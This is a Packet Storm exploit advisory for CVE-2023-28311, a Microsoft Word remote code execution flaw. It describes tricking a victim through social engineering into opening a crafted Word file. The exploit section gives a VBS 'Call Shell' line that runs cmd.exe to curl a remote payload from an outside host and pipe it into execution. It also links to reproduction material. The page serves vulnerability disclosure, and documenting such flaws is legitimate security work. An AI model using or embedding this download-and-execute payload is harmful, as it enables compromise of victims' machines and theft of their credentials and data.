Microsoft Word Remote Code Execution ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        ## Title: Microsoft Word Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28311
## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website which could lead to a local attack on
the victim's computer. The attacker can trick the victim to open a
malicious web page by using a `Word` malicious file and he can steal
credentials, bank accounts information, sniffing and tracking all the
traffic of the victim without stopping - it depends on the scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!
```vbs
Call Shell("cmd.exe /S /c" & "curl -s
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
[href](
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)
## Proof and Exploit
[href](https://streamable.com/s60x3k)
## Time spend:
01:00:00

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (932)
• Advisory^[20] (80,729)
• Arbitrary^[21] (15,952)
• BBS^[22] (2,859)
• Bypass^[23] (1,660)
• CGI^[24] (1,022)
• Code Execution^[25] (7,087)
• Conference^[26] (677)
• Cracker^[27] (840)
• CSRF^[28] (3,310)
• DoS^[29] (22,985)
• Encryption^[30] (2,359)
• Exploit^[31] (50,898)
• File Inclusion^[32] (4,190)
• File Upload^[33] (951)
• Firewall^[34] (821)
• Info Disclosure^[35] (2,697)
• Intrusion Detection^[36] (879)
• Java^[37] (2,963)
• JavaScript^[38] (834)
• Kernel^[39] (6,488)
• Local^[40] (14,327)
• Magazine^[41] (586)
• Overflow^[42] (12,556)
• Perl^[43] (1,419)
• PHP^[44] (5,112)
• Proof of Concept^[45] (2,298)
• Protocol^[46] (3,513)
• Python^[47] (1,488)
• Remote^[48] (30,375)
• Root^[49] (3,541)
• Rootkit^[50] (504)
• Ruby^[51] (603)
• Scanner^[52] (1,633)
• Security Tool^[53] (7,833)
• Shell^[54] (3,143)
• Shellcode^[55] (1,210)
• Sniffer^[56] (892)
• Spoof^[57] (2,186)
• SQL Injection^[58] (16,188)
• TCP^[59] (2,389)
• Trojan^[60] (687)
• UDP^[61] (881)
• Virus^[62] (663)
• Vulnerability^[63] (31,418)
• Web^[64] (9,485)
• Whitepaper^[65] (3,740)
• x86^[66] (948)
• XSS^[67] (17,611)
• Other^[68]

File Archives

• April 2023^[69]
• March 2023^[70]
• February 2023^[71]
• January 2023^[72]
• December 2022^[73]
• November 2022^[74]
• October 2022^[75]
• September 2022^[76]
• August 2022^[77]
• July 2022^[78]
• June 2022^[79]
• May 2022^[80]
• Older^[81]

Systems

• AIX^[82] (426)
• Apple^[83] (1,966)
• BSD^[84] (372)
• CentOS^[85] (56)
• Cisco^[86] (1,920)
• Debian^[87] (6,723)
• Fedora^[88] (1,691)
• FreeBSD^[89] (1,244)
• Gentoo^[90] (4,288)
• HPUX^[91] (878)
• iOS^[92] (342)
• iPhone^[93] (108)
• IRIX^[94] (220)
• Juniper^[95] (67)
• Linux^[96] (45,257)
• Mac OS X^[97] (684)
• Mandriva^[98] (3,105)
• NetBSD^[99] (256)
• OpenBSD^[100] (482)
• RedHat^[101] (12,990)
• Slackware^[102] (941)
• Solaris^[103] (1,609)
• SUSE^[104] (1,444)
• Ubuntu^[105] (8,494)
• UNIX^[106] (9,218)
• UnixWare^[107] (185)
• Windows^[108] (6,539)
• Other^[109]

© 2022 Packet Storm. All rights reserved.